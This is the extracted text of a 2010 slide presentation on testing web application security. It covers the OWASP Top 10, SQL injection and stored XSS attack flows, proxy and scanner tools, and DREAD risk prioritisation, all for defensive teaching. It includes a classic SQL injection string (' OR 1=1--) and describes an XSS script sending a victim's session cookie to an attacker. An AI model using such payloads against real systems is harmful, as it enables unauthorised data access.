Hands on Demonstration for Testing Security in Web Applications Aaron Weaver August 2010

Agenda What kind of application security vulnerabilities should be tested? Methodology for testing Open source tools available Prioritizing application security defects

In the news...

the Solution?

AND NO Not in the Cloud!

Web Application Security Testing

OWASP Top 10 list

Top attacks SQL Injection Cross Site Scripting Authentication

"SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" SQL Injection Account: SKU: Account: SKU: "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" 1. Application presents a form to the attacker Account Summary Acct:5424-6066-2134-4334 Acct:4128-7574-3921-0192 Acct:5424-9383-2039-4029 Acct:4128-0004-1234-0293 HTTP response   DB Table   HTTP request Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce SQL query Bus. Functions Databases Legacy Systems Web Services Directories Human Resrcs Billing Application Layer 2. Attacker sends an attack in the form data APPLICATION ATTACK Custom Code 3. Application forwards attack to the database in a SQL query App Server 4. Database runs query containing attack and sends encrypted results back to application Web Server Hardened OS Network Layer Firewall Firewall 5. Application decrypts data as normal and sends results to the user

Cross-Site Scripting 1 Attacker sets the trap – update my profile Application with stored XSS vulnerability Attacker enters a malicious script into a web page that stores the data on the server Custom Code Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions 2 Victim views page – sees attacker profile Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie

Authentication

Tools Overview

Tools Proxies Burp Suite Paros WebScarab Fiddler FoxyProxy plugin Open source scanners Skipfish

Burp Suite http://portswigger.net/proxy/

FoxyProxy Browser Plugin https://addons.mozilla.org/en-US/firefox/addon/2464/

* External untrusted embedded content. Skipfish A fully automated, active web application security reconnaissance tool * Server-side SQL injection (including blind vectors, numerical parameters). * Stored and reflected XSS * Directory listing bypass vectors. * External untrusted embedded content. http://code.google.com/p/skipfish/

Cheat Sheet

Quick Cheat Sheet

Cheat Sheet

AppSec Tools Demonstration

Prioritizing

Threat Risk D R E A D amage potential eproducibility xploitability • If a threat exploit occurs, how much damage will be caused? ◦ 0 = Nothing ◦ 5 = Individual user data is compromised or affected. ◦ 10 = Complete system or data destruction Reproducibility • How easy is it to reproduce the threat exploit? ◦ 0 = Very hard or impossible, even for administrators of the application. ◦ 5 = One or two steps required, may need to be an authorized user. ◦ 10 = Just a web browser and the address bar is sufficient, without authentication. Exploitability • What is needed to exploit this threat? ◦ 0 = Advanced programming and networking knowledge, with custom or advanced attack tools. ◦ 5 = Malware exists on the Internet, or an exploit is easily performed, using available attack tools. ◦ 10 = Just a web browser Affected Users • How many users will be affected? ◦ 0 = None ◦ 5 = Some users, but not all ◦ 10 = All users Discoverability • How easy is it to discover this threat? ◦ 0 = Very hard to impossible; requires source code or administrative access. ◦ 5 = Can figure it out by guessing or by monitoring network traces. ◦ 9 = Details of faults like this are already in the public domain and can be easily discovered using a search engine. ◦ 10 = The information is visible in the web browser address bar or in a form. E xploitability A ffected users D iscoverability

Scoring D } R 0-15 E 0-3 = Total A D

Severity Rating Low 1-7 Medium 8-10 High 11-14 Critical 15

Threat Risk Modeling STRIDE (Microsoft) OWASP Risk Ranking Trike CVSS

Questions?

Thanks!